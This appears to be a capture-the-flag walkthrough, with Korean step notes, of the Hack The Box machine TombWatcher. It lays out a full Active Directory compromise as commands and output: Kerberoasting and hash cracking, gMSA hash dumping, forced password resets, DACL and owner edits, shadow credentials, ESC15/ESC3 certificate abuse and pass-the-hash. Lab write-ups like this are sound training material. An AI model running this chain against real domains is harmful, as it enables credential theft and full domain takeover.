Proof of Concept
10.129.232.167
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsmanInformation Gathering
호스트 정보 수집
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc smb 10.129.232.167 --generate-hosts-file hosts
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat hosts
10.129.232.167 DC01.tombwatcher.htb tombwatcher.htb DC01/etc/hosts 파일 추가
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat /etc/hosts
<SNIP>
10.129.232.167 DC01.tombwatcher.htb tombwatcher.htb DC01blood-hound 정보 수집
┌──(kali🎃kali)-[~/TombWatcher]
└─$ bloodhound-python -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!' -ns 10.129.232.167 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Testing resolved hostname connectivity dead:beef::c445:184b:9f34:c94e
INFO: Trying LDAP connection to dead:beef::c445:184b:9f34:c94e
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.tombwatcher.htb
INFO: Testing resolved hostname connectivity dead:beef::c445:184b:9f34:c94e
INFO: Trying LDAP connection to dead:beef::c445:184b:9f34:c94e
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: SMB SessionError: code: 0xc00000ac - STATUS_PIPE_NOT_AVAILABLE - An instance of a named pipe cannot be found in the listening state.
INFO: Done in 00M 46SAuth as Alfred
henry / H3nry_987TGV!
Checked the bloodhound-ce
- The user HENRY@TOMBWATCHER.HTB has the ability to write to the “serviceprincipalname” attribute to the user ALFRED@TOMBWATCHER.HTB.
DC와 시간 동기화
┌──(kali🎃kali)-[~/TombWatcher]
└─$ sudo timedatectl set-ntp off
┌──(kali🎃kali)-[~/TombWatcher]
└─$ sudo rdate -n 10.129.232.167
Tue Jan 13 14:08:17 EST 2026커버로스팅 수행
- Alfred 해쉬 획득
┌──(kali🎃kali)-[~/TombWatcher]
└─$ ./targetedKerberoast.py -v -d 'tombwatcher.htb' -u 'henry' -p 'H3nry_987TGV!'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$4f2fdd510307868317ad302f4dff03d0$379fd2e28c1a148f82dbd5f2a3269496a5545b763211d80441c44d436c2d510b0bec49889bf5630666fdb0946cf882483119658a4a0e589086cd201628eae6faf79d0ad9fb08b9b62e623b9f834da062eb2129ffab275b1ed0c0fbbd9168c88814a7170d8e42c08d9fe57fa95a1c1a5250e465a96e2ff0bab6ebd91b030e75e6f687d893a2d01f1a6f52df95170239ab7939742fab33407f2c825517ef04ad8383869888b42ae078102b1f6518153d15a26443bc78999a9cb2bc7cd1a63ff0bc5836fcd6029afaad736d95a523b5dddbd7879f8d9b055e8a3ede1f63641783f7406be0f0b95d6a05b776feb95369cb6b3a46f851b783fbf36631a554e48ab2e33e57a4f147cf1ddc4e8187633b9d2f19e53380d9462a4c8e1be537bccb031425dea9ca8ccd4f49a02dfee9debb392756a4c4b1857d8ec8fbc7502974978d80447e2d98c3be2ce97634e426a4d6e148561e1c3046ec15bf4326b616aa859cf864bf1a00387ebaed838514dba1fba27b6f4aa532576a522ba54cde2c3705118a1ca9b9f4519917b333b458c758123ac47e6d29df67e2cbe0d9662d6942f3a8c71dcd99768c625290b388d048f5b8977e840ce2c21165e81e885dc418b831e6a7d782a6aa3c9c6be0d43afe6d84b4013af73de6d524d317259cbffd68e692ba0e268f2af9944fdc4a6f236ebdc6b86c8392856d7ecb715705335a225ca03bc19ab9586cda27a8ce03a4b43c4a48319165f35c469e37f40342e69f0c02ce1f213ad65070965a97929c14c59607e7a5de049f97c5513fdd902f63d35e3ebc77e51e636e2cef63d9105c122f2fb56b82de9213f1ecc5afbd378567c1dae1257a8b18bdaad5e39174914617f076a47d9cf8b4f6dde9a1bc7704649a93d62c004ac57a9297c31cde95d101ae077eab6022dacef8020127d95344ea75bc8d6ce9ca67e24ce7b3ad5a2720a60a99a15276d61aaad7e5404e089e2333b77d1bacfc653c259dbc58e446f543b85e2112d90545891425780bb8a81950a135dd6832c13393bbc441eb3a367681829c59680f62d8340fdfdf1151c2057d7f39bfc85a7877bb84cced622ef9803ff3285e6e2014b86b46c4f5d9df6e8d6da896434a2498608d863398255de67f1f4cbcdc32e6bb7f20b53bcc216b3e3f917bef2169c831000d6428e50cf760f00f57deab6f88168cea7d7a355d63946d96ebd7c5f476d14da0cd9a8c96f32aca7133a1cfee8d8016593e2d670ded8765af155f62debc8cc3d63ca40df0081435adeabf88a37c0237fbf965658778fd65bb4235c42c434753b5504880b1507d54dafede6b25434c71d47f4ca389171c1b98a8c1483ae46bbf2920088c16b1dda0914e0e90ea768b387d7b392b62609660baf69113e45c1c9021c15c658ae62874b44c1cc0e356c20142283f65056169716a7c27d46fd405273d5fca4c27c55d3d121453a12cf6b15563ff4697b8cabf5e
[VERBOSE] SPN removed successfully for (Alfred)해시 크랙
- Alfred 평문 비밀번호 획득
- basketball
┌──(kali🎃kali)-[~/TombWatcher]
└─$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --quiet
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$4f2fdd510307868317ad302f4dff03d0$379fd2e28c1a148f82dbd5f2a3269496a5545b763211d80441c44d436c2d510b0bec49889bf5630666fdb0946cf882483119658a4a0e589086cd201628eae6faf79d0ad9fb08b9b62e623b9f834da062eb2129ffab275b1ed0c0fbbd9168c88814a7170d8e42c08d9fe57fa95a1c1a5250e465a96e2ff0bab6ebd91b030e75e6f687d893a2d01f1a6f52df95170239ab7939742fab33407f2c825517ef04ad8383869888b42ae078102b1f6518153d15a26443bc78999a9cb2bc7cd1a63ff0bc5836fcd6029afaad736d95a523b5dddbd7879f8d9b055e8a3ede1f63641783f7406be0f0b95d6a05b776feb95369cb6b3a46f851b783fbf36631a554e48ab2e33e57a4f147cf1ddc4e8187633b9d2f19e53380d9462a4c8e1be537bccb031425dea9ca8ccd4f49a02dfee9debb392756a4c4b1857d8ec8fbc7502974978d80447e2d98c3be2ce97634e426a4d6e148561e1c3046ec15bf4326b616aa859cf864bf1a00387ebaed838514dba1fba27b6f4aa532576a522ba54cde2c3705118a1ca9b9f4519917b333b458c758123ac47e6d29df67e2cbe0d9662d6942f3a8c71dcd99768c625290b388d048f5b8977e840ce2c21165e81e885dc418b831e6a7d782a6aa3c9c6be0d43afe6d84b4013af73de6d524d317259cbffd68e692ba0e268f2af9944fdc4a6f236ebdc6b86c8392856d7ecb715705335a225ca03bc19ab9586cda27a8ce03a4b43c4a48319165f35c469e37f40342e69f0c02ce1f213ad65070965a97929c14c59607e7a5de049f97c5513fdd902f63d35e3ebc77e51e636e2cef63d9105c122f2fb56b82de9213f1ecc5afbd378567c1dae1257a8b18bdaad5e39174914617f076a47d9cf8b4f6dde9a1bc7704649a93d62c004ac57a9297c31cde95d101ae077eab6022dacef8020127d95344ea75bc8d6ce9ca67e24ce7b3ad5a2720a60a99a15276d61aaad7e5404e089e2333b77d1bacfc653c259dbc58e446f543b85e2112d90545891425780bb8a81950a135dd6832c13393bbc441eb3a367681829c59680f62d8340fdfdf1151c2057d7f39bfc85a7877bb84cced622ef9803ff3285e6e2014b86b46c4f5d9df6e8d6da896434a2498608d863398255de67f1f4cbcdc32e6bb7f20b53bcc216b3e3f917bef2169c831000d6428e50cf760f00f57deab6f88168cea7d7a355d63946d96ebd7c5f476d14da0cd9a8c96f32aca7133a1cfee8d8016593e2d670ded8765af155f62debc8cc3d63ca40df0081435adeabf88a37c0237fbf965658778fd65bb4235c42c434753b5504880b1507d54dafede6b25434c71d47f4ca389171c1b98a8c1483ae46bbf2920088c16b1dda0914e0e90ea768b387d7b392b62609660baf69113e45c1c9021c15c658ae62874b44c1cc0e356c20142283f65056169716a7c27d46fd405273d5fca4c27c55d3d121453a12cf6b15563ff4697b8cabf5e:basketballAlfred/basketball로 smb 인증 성공
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ nxc smb 10.129.232.167 -u 'Alfred' -p 'basketball'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\Alfred:basketballAuth as ANSIBLE_DEV
Checked the bloodhound-ce
- The user ALFRED@TOMBWATCHER.HTB has the ability to add itself, to the group INFRASTRUCTURE@TOMBWATCHER.HTB. Because of security group delegation, the members of a security group have the same privileges as that group.
- ANSIBLE_DEV@TOMBWATCHER.HTB.
INFRASTRUCTURE 그룹에 Alfred 추가
┌──(kali🎃kali)-[~/TombWatcher]
└─$ bloodyAD -d 'tombwatcher.htb' -u 'Alfred' -p 'basketball' --host '10.129.232.167' add groupMember INFRASTRUCTURE Alfred
[+] Alfred added to INFRASTRUCTUREansible_dev$ 계정의 NTLM 해시 획득
- 22d7972cb291784b28f3b6f5bc79e4cf
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc ldap dc01.tombwatcher.htb -u 'Alfred' -p 'basketball' --gmsa
LDAP 10.129.232.167 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb)
LDAPS 10.129.232.167 636 DC01 [+] tombwatcher.htb\Alfred:basketball
LDAPS 10.129.232.167 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.232.167 636 DC01 Account: ansible_dev$ NTLM: 22d7972cb291784b28f3b6f5bc79e4cf PrincipalsAllowedToReadPassword: Infrastructure획득한 NTLM 해시를 사용해서 ansible_dev$ 계정 SMB 인증 성공
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ nxc smb 10.129.232.167 -u 'ansible_dev$' -H '22d7972cb291784b28f3b6f5bc79e4cf'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\ansible_dev$:22d7972cb291784b28f3b6f5bc79e4cfAuth as SAM
Checked the bloodhound-ce
- The user ANSIBLE_DEV$@TOMBWATCHER.HTB has the capability to change the user SAM@TOMBWATCHER.HTB’s password without knowing that user’s current password.
Changed the user SAM’s password to “1q2w3e4r”
┌──(kali🎃kali)-[~/TombWatcher]
└─$ bloodyAD --host 'dc01.tombwatcher.htb' -u 'ansible_dev$' -p ':22d7972cb291784b28f3b6f5bc79e4cf' set password sam '1q2w3e4r'
[+] Password changed successfully!변경한 비밀번호를 사용하여 SAM 계정으로 SMB 인증 성공
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc smb dc01.tombwatcher.htb -u 'sam' -p '1q2w3e4r'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\sam:1q2w3e4rAuth as JOHN
Checked the bloodhound-ce
- The user SAM@TOMBWATCHER.HTB has the ability to modify the owner of the user JOHN@TOMBWATCHER.HTB.
소유권 변경
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ impacket-owneredit -action write -new-owner SAM -target JOHN tombwatcher.htb/SAM:'1q2w3e4r' -dc-ip 10.129.232.167
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-1105
[*] - sAMAccountName: sam
[*] - distinguishedName: CN=sam,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!GenericAll 권한 위임
┌──(kali🎃kali)-[~/TombWatcher/gMSADumper]
└─$ impacket-dacledit -action write -rights FullControl -principal SAM -target JOHN tombwatcher.htb/SAM:'1q2w3e4r' -dc-ip 10.129.232.167
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260113-144929.bak
[*] DACL modified successfully!강제 비밀번호 변경
- JOHN / 1q2w3e4r
┌──(kali🎃kali)-[~/TombWatcher/pywhisker/pywhisker]
└─$ net rpc password "JOHN" "1q2w3e4r" -U "tombwatcher.htb"/"SAM"%"1q2w3e4r" -S "DC01.tombwatcher.htb"JOHN 계정으로 SMB 인증 성공
┌──(kali🎃kali)-[~/TombWatcher/pywhisker/pywhisker]
└─$ nxc smb 10.129.232.167 -u 'JOHN' -p '1q2w3e4r'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\JOHN:1q2w3e4r
evil-winrm으로 연결
┌──(kali🎃kali)-[~/TombWatcher/pywhisker/pywhisker]
└─$ evil-winrm -i 10.129.232.167 -u 'JOHN' -p '1q2w3e4r'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\john\Desktop> type user.txt
ffb880f84c3d0bce09873fa3489bb846
*Evil-WinRM* PS C:\Users\john\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::f644:dcfa:6455:35cd
Link-local IPv6 Address . . . . . : fe80::a820:667f:4301:f7d6%5
IPv4 Address. . . . . . . . . . . : 10.129.232.167
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:acf1%5
10.10.10.2
10.129.0.1Privilege Escalation (john to cert_admin)
Checked the bloodhound-ce
- The user JOHN@TOMBWATCHER.HTB has GenericAll permissions to the OU ADCS@TOMBWATCHER.HTB.
certify AD CS 환경 조사 (취약점 스캔)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad find -u 'john' -p '1q2w3e4r' -target 10.129.232.167
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Failed to lookup object with SID 'S-1-5-21-1392491010-1358638721-2126982587-1111'
[*] Saving text output to '20260118150901_Certipy.txt'
[*] Wrote text output to '20260118150901_Certipy.txt'
[*] Saving JSON output to '20260118150901_Certipy.json'
[*] Wrote JSON output to '20260118150901_Certipy.json'S-1-5-21-1392491010-1358638721-2126982587-512가 WebServer 템플릿에 Enrollment Rights 권한 가지고 있음
- 하지만 사용자 조회 안되는걸로 보아 삭제된 계정으로 추측
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat 20260118150901_Certipy.txt
<SNIP>
17
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111삭제된 AD 사용자 조회
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
<SNIP>
CN : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
codePage : 0
countryCode : 0
Created : 11/16/2024 12:07:04 PM
createTimeStamp : 11/16/2024 12:07:04 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
dSCorePropagationData : {11/16/2024 12:07:10 PM, 11/16/2024 12:07:08 PM, 12/31/1600 7:00:00 PM}
givenName : cert_admin
instanceType : 4
isDeleted : True
LastKnownParent : OU=ADCS,DC=tombwatcher,DC=htb
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 11/16/2024 12:07:27 PM
modifyTimeStamp : 11/16/2024 12:07:27 PM
msDS-LastKnownRDN : cert_admin
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectSid : S-1-5-21-1392491010-1358638721-2126982587-1111
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133762504248946345
sAMAccountName : cert_admin
sDRightsEffective : 7
sn : cert_admin
userAccountControl : 66048
uSNChanged : 13197
uSNCreated : 13186
whenChanged : 11/16/2024 12:07:27 PM
whenCreated : 11/16/2024 12:07:04 PM삭제된 계정 복구
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents> Get-ADUser cert_admin
DistinguishedName : CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
Enabled : True
GivenName : cert_admin
Name : cert_admin
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
SamAccountName : cert_admin
SID : S-1-5-21-1392491010-1358638721-2126982587-1111
Surname : cert_admin
UserPrincipalName :Shadow Credentials 공격
- cert_admin의 NTLM 해시 획득
- f87ebf0febd9c4095c68a88928755773
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad shadow auto -u 'JOHN@tombwatcher.htb' -p '1q2w3e4r' -dc-ip 10.129.232.167 -account cert_admin
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'cert_admin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7d1adece47e04e15990894194297388d'
[*] Adding Key Credential with device ID '7d1adece47e04e15990894194297388d' to the Key Credentials for 'cert_admin'
[*] Successfully added Key Credential with device ID '7d1adece47e04e15990894194297388d' to the Key Credentials for 'cert_admin'
[*] Authenticating as 'cert_admin' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'cert_admin@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'cert_admin.ccache'
[*] Wrote credential cache to 'cert_admin.ccache'
[*] Trying to retrieve NT hash for 'cert_admin'
[*] Restoring the old Key Credentials for 'cert_admin'
[*] Successfully restored the old Key Credentials for 'cert_admin'
[*] NT hash for 'cert_admin': f87ebf0febd9c4095c68a88928755773cert_admin으로 SMB 인증 성공
┌──(kali🎃kali)-[~/TombWatcher]
└─$ nxc smb 10.129.232.167 -u 'cert_admin' -H 'f87ebf0febd9c4095c68a88928755773'
SMB 10.129.232.167 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.129.232.167 445 DC01 [+] tombwatcher.htb\cert_admin:f87ebf0febd9c4095c68a88928755773Privilege Escalation (cert_admin to Administrator)
certipy로 취약점 스캔
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad find -u 'cert_admin' -hashes 'f87ebf0febd9c4095c68a88928755773' -target 10.129.232.167
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260119142917_Certipy.txt'
[*] Wrote text output to '20260119142917_Certipy.txt'
[*] Saving JSON output to '20260119142917_Certipy.json'
[*] Wrote JSON output to '20260119142917_Certipy.json'WebServer 템플릿에서 ESC15 취약점 발견
┌──(kali🎃kali)-[~/TombWatcher]
└─$ cat 20260119142917_Certipy.txt
<SNIP>
17
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.=ESC15 악용
WebServer 템플릿에 Certificate Request Agent 정책 주입 (CVE-2024-49019)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad req \
-u 'cert_admin@tombwatcher.htb' -hashes 'f87ebf0febd9c4095c68a88928755773' \
-dc-ip '10.129.232.167' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'WebServer' \
-application-policies 'Certificate Request Agent'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'cert_admin.pfx'
[*] Wrote certificate and private key to 'cert_admin.pfx'Enrollment Agent 인증서로 Administrator 대신 User 템플릿 요청 (ESC3)
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad req \
-u 'cert_admin' -hashes 'f87ebf0febd9c4095c68a88928755773' \
-dc-ip '10.129.232.167' -target 'DC01.tombwatcher.htb' \
-ca 'tombwatcher-CA-1' -template 'User' \
-pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
Administrator 인증서로 Kerberos 인증 및 NT hash 추출
- Administrator : f61db423bebe3328d33af26741afe5fc
┌──(kali🎃kali)-[~/TombWatcher]
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.129.232.167'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@tombwatcher.htb'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Using principal: 'administrator@tombwatcher.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@tombwatcher.htb': aad3b435b51404eeaad3b435b51404ee:f61db423bebe3328d33af26741afe5fcAdministrator NT hash로 Pass-the-Hash 접속
┌──(kali🎃kali)-[~/TombWatcher]
└─$ evil-winrm -i 10.129.232.167 -u 'administrator' -H 'f61db423bebe3328d33af26741afe5fc'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
410875990f24ff2d96279fb152af5e73
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::92ef:92a:4197:3c0
Link-local IPv6 Address . . . . . : fe80::bf9a:823f:118c:f510%5
IPv4 Address. . . . . . . . . . . : 10.129.232.167
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.10.10.2
10.129.0.1